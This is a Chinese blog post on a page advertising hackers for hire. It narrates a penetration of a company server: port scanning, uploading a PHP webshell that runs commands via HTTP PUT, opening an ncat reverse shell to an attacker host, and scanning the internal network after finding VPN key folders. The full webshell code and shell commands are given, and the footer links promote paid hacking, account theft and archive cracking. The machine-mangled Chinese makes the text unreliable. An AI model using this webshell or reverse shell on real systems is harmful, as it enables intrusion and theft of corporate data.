我是怎么经过指令履行到终究获取内网Root权限的

访客6年前黑客文章563

你的子域名叫什么?
这一切都是从信息侦查开端的查找子域,解析为IP然后检查端口。不过这一次,我发现了一个较为古怪的主机名,并有一个应用程序正运行在64351端口上。这并不是咱们平常常见的web端口,需求咱们进行权全端口的扫描才干发现。该域名相似于以下(出于保密原因,其间省掉了该公司信息):
fast.force.staging.intcorp.yoda.domain.com
关于这个域名我的脑海中蹦出了以下猜想:
1)这是除admin,vpn,email等以外的仅有一个域
2)成心说到intcorp引起我的爱好
3)这不是子域的均匀长度
4) fast force staging intcorp yoda或许都是随机发生的!
依据我的主意,我解析了该域名并成功获取到了一个IP,但经过阅读器翻开发现没有回来任何信息,我决议运用nmap来对它进行端口扫描:
nmap -sTV -p- -Pn --max-retries 3 fast.force.staging.intcorp.yoda.domain.com --version-all -oA UsethePowa
不一会儿扫描成果就出来了如下:
Starting Nmap 7.50 ( https://nmap.org ) at 2019-06-29 22:47 BST 
Nmap scan report for fast.force.staging.intcorp.yoda.domain.com (x.x.x.x) 
Host is up (0.082s latency). 
Not shown: 979 filtered ports 
PORT     STATE  SERVICE         VERSION 
22/tcp   closed ssh 
25/tcp   closed *** tp? 
80/tcp   closed http 
81/tcp   closed hosts2-ns 
90/tcp    open http? 
64351/tcp open http 
2 services unrecognised despite returning data.
开始我在端口为64351的应用程序web根目录中发现了一些古怪的文件,而且每个文件都包含了不同称号的phpinfo文件。
想要将自界说的文件上传到该目录,一般咱们会运用文件上传等功能。但在这儿我没有找到任何像长途文件上传的当地,因而我只能老套的针对校园进犯的HTTP办法。
HTTP 动词/办法
无论是HTTP动词/办法,本质上它们都是在向服务器或应用程序宣布恳求。最常见的两个用于下载和上传数据到应用程序的恳求办法是GET和POST。这儿我将向端口为64351的服务器发送一个OPTIONS恳求,以获取服务器支撑的HTTP恳求办法。
从呼应成果来看该应用程序承受GET,POST,HEAD以及PUT办法。前三个都很一般,但PUT恳求相对较少。
PUT
我设法运用PUT办法将文件写入到webroot下名为test的文件夹中,这样我就能够将编写的恣意文件上传至服务器根目录下,一起我猜想之前发现的phpinfo文件应该也是运用PUT办法被上传的。我快速阅读了我的webshell再次找到了phpinfo文件:

所以经过PUT办法,我上传了一个简略的PHP webshell,其代码如下:
 
if(isset($_REQUEST['cmd'])){ 
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "$cmd
";
    die;
}
?>
这段代码首先从cmd参数接纳输入指令,然后以体系指令履行。PUT恳求成功,而且咱们也成功获取到了一个shell如下所示:

为了获取到更多的信息,我测验将webshell转换为netcat的反向shell。很走运!这个服务器好像都具有了netcat ncat的拜访。
运用以下指令我衔接到了服务器侦听端,这儿我花了很长时刻来确认衔接端口,终究确认为443,由于服务器答应拜访该端口。
webshell指令:
ncat -e /bin/bash ATTACKERHOST 443
服务器侦听端指令:
ncat -l -v -p 443

接着经过python one-liner我获得了一个交互式的bash shell:
python -c 'import pty; pty.spawn("/bin/bash")'

深化发掘
已然现已获取到了一个交互式的shell,接下来我决议环绕操作体系进一步的探究。很快,我在/tmp/CorpNet目录下发现了一个引起我留意的文件夹,该文件夹下包含了以下三个其它文件夹:
CorpVPNKeys
CorpZT
CitrixCorp
在这些文件夹中我发掘到了一些十分有用的文件,其间包含一个包含整个域的内部区域传输的文件。
查找其他主机
经过区域传输文件中的信息,我发现内部主机名与我现已发现的原始主机名相似,如下:
staging.intcorp.jawa.domain.com 10.0.1.1
staging.internal.sith.domain.com 10.0.1.3
internal.vader.domain.com 10.2.1.13
看起来这个 *** 的体系管理员是一个星球大战的粉丝!有许多其他主机同享了星战命名计划。由于主机能够拜访ncat和nmap,因而我决议在这个阶段做一些端口扫描。我测验对10.0.1.0/24这个网段进行了扫描,以发现其它风趣的主机。
一个快速的nmap -F 10.0.1.0/24扫描,从终究回来的成果我发现了一些十分风趣的端口。其间包含一台应该是windows机器敞开的长途桌面衔接端口:3389,445,135,137,1433,2433。关于一个内部 *** ,RDP和 *** B的敞开并不罕见。

[1] [2]  黑客接单网

相关文章

专业接单黑客联系方式_找黑客黑电脑看试卷

管道履行日志三、 进犯面和方针扩大化17、123123 (无变化)下面是举例阐明的电话脚本专业接单黑客联系方式,找黑客黑电脑看试卷 2.1 AuthenticationManager, Provide...

赌博输了万,怎么才能要回来,代理商是同

test.localWindows XP(已停止维护)微软再次发布对于CVE-2019-0708漏洞做修补的提醒,基于漏洞的严重性强烈建议用户尽快升级修复漏洞复现赌博输了万,怎么才能要回来,代理商是同...

黑客接单交易平台网_淘宝买家电话

SplashData剖析的这500万被走漏的暗码主要是北美和西欧的用户,成人网站走漏的暗码不包含在剖析陈述中。 有多种体系或软件的弱口令遭受进犯,这儿勒索病毒最常用的是远程桌面登录弱口令。 除此外,勒...

qq学习网,盗号黑客联系,黑客套利为什么要找异地人注册

1.BT5默许用户名:root.暗码:toor(公司是yeslabccies)进入论坛后,寻觅与linhai有关的信息,发现有他宣布的文章,点击斑竹称号 [linhai];http://js.acfu...

破解压缩包_找一本电脑黑客的小说-百度账号找黑客破解

11.清空一个网卡接口的一切IP装备信息: 从零开始学CSRFSqli_engineScore 200那么咱们对照一下这两段:下面咱们借助于东西sqlHelper来进行cookie注入,下载地址...

黑客接单 诚信黑客图片,重庆哪里可以找黑客,gta5黑客找数字

阔以。 d16e6ef8f110196e3789cce1b3074663用baidu 要害字便是比较稀有的脚本名这儿ip运用服务器的ip,端口默许50050,用户名随意,暗码为之前设置的暗码,然后co...